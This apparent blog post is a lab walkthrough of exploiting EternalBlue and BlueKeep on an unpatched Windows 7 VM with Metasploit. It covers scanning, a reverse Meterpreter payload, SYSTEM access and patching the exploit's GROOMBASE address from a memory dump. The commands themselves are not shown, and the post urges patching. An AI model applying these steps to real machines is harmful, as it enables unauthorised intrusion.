Press "Enter" to skip to content

Exploiting Bluekeep and Eternalblue vulnerabilities

Today there are still many companies using legacy operating systems such as Windows 7 SP1 and Windows Server 2008 R2.

In this post we will see the risk that companies are exposed to if they do not regularly update their systems.

For this post we will use a Windows 7 SP1 machine which does not have any of the following security patches installed from Microsoft:

  • KB4012212 – KB4012215 – KB4012218 – KB4015549 – KB4015552 (MS17-010 patch Eternalblue)
  • KB4499164 – KB 4499175 (CVE-2019-0708 Bluekeep)

For this demo we will use the Metasploit framework which has already exploits for both vulnerabilities, just updating Metasploit with ‘apt update; apt install metasploit-framework‘. We will usee Kali Linux as attacker machine.

Exploiting Eternalblue vulnerability

In April 2017 a group of hackers called “Shadow Brokers” published a list of confidential tools and exploits used by the NSA agency.

One of the published exploits was “EternalBlue” which exploits a vulnerability in Microsoft’s Server Message Block (SMB) protocol implementation. This vulnerability, denoted as CVE-2017-0144 specifically exploited a flaw in the SMBv1 version of the protocol allowing remote code execution.

Microsoft released a patch for this vulnerability in March 2017, but in May 2017 occurred one of the biggest cybersecurity incident globally, known as “WannaCry”. It was a ransomware that used this vulnerability to propagate itself mainly to legacy computers (Windows XP, Windows Server 2003/2008, Windows 7, Windows 8.1) where the SMBv1 protocol is enabled by default. If companies had applied Microsoft’s patch in time they would not have been affected by WannaCry ransomware but the update policy in most companies is delayed from 6 months to 1 year.

Let’s see how an attacker can use Metasploit’s modules to take advantage of this vulnerability.

The first step would be from the Metasploit console to use one of the auxiliary modules to scan in the local network possible vulnerable computers. To do this we will use the module:

Now that we have found a possible victim (192.168.0.205), let’s run the exploit module with the following options:

 

As payload we have set a Meterpreter remote tcp connection towards our attacked machine (192.168.0.202). After running the exploit we got the Meterpreter session:

As we can see now we have SYSTEM authority access over the target machine:

And therefore we have full control over the victim machine, as example the creation of a simple PWNED.txt file:

 

Exploiting Bluekeep vulnerability

This vulnerability CVE-2019-0708 was disclosed on May 2019 and an attacker could execute remote code on a vulnerable machine using a flaw on the RDP protocol. This vulnerability affects only to Windows 7 and Windows Server 2008 systems and Microsoft released a patch on 14 May 2019. However the update policy of most companies is to slow and could be thousands of machines still vulnerables to this attack. This is more frightening when considering that Shodan shows almost 4 million devices with RDP exposed to Internet:

 

As well as Eternalblue, Metasploit has a scanner to detect vulnerable machines on our local network:

Once again, our victim machine (192.168.0.205) is vulnerable to this vulnerability. The next step is to use the exploit module and set the options properly.

NOTE: As we can see on the exploit options, there are an option called “target”. The Metasploit module has 6 predefined possible target machines and each of them has a hardcoded GROOMBASE address on the exploit source code. In our case we are using a VM on Proxmox 5.4.5 virtual Environment so the exploit won’t work with any of target type options. We have to find out first which is the start non-paged pool address of the memory of our VM.

To get the start non-paged pool memory address we need an entire dump of the VM memory, for that we can use the following Microsoft tool

NOTE: To enable the complete memory dump on crash we need to enable the following regristry key “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\CrashControl” and set the value of the “CrashDumpEnabled” to “0x1“.

Once we got a complete memory dump of the machine, we can use the Windows Debugger windbg.exe (download). We open the .dmp file and we can use the following command to find the non-paged pool addresses:

As we can see the start memory address is 0xfffffa8001807000. So finally we need to modify the source code of the exploit and change the GROOMBASE address for target 1 option:

Now we are ready to launch the exploit using the target 1 option:

And that’s all 🙂

Hope you find this post useful and keep always your OS up to date.

Be First to Comment

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.